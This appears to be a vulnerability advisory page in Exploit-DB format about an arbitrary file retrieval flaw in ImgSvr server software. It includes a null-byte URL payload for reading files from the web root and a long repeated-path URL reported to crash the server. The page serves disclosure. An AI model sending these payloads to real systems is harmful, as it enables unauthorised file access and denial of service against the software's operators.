ImgSvr server software Arbitrary File Retrieval Vulnerability

vendor:

ImgSvr server software

by:

Unknown

5.5

CVSS

MEDIUM

Arbitrary File Retrieval

Unknown

CWE

Product Name: ImgSvr server software

Affected Version From: Unknown

Affected Version To: Unknown

Patch Exists: NO

Related CWE: Unknown

CPE: Unknown

Metasploit:

Other Scripts:

Platforms Tested: Unknown

Unknown

ImgSvr server software Arbitrary File Retrieval Vulnerability

A vulnerability in the ImgSvr server software allows a remote user to retrieve arbitrary files from the web server root directory and its subdirectories. An attacker can gain access to arbitrary scripts within the server root directory.

Mitigation:

Unknown

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/10027/info

A vulnerability has been reported in the ImgSvr server software that may allow a remote user to the retrieve arbitrary files from the web server root directory and any subdirectories therein.

An attacker may leverage this issue to gain access to arbitrary scripts contained within the server root directory. 

http://www.example.org:1234/someDirectory/fileName%00

The following has been reported to crash the affected server:
http://127.0.0.1:1234/%00/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/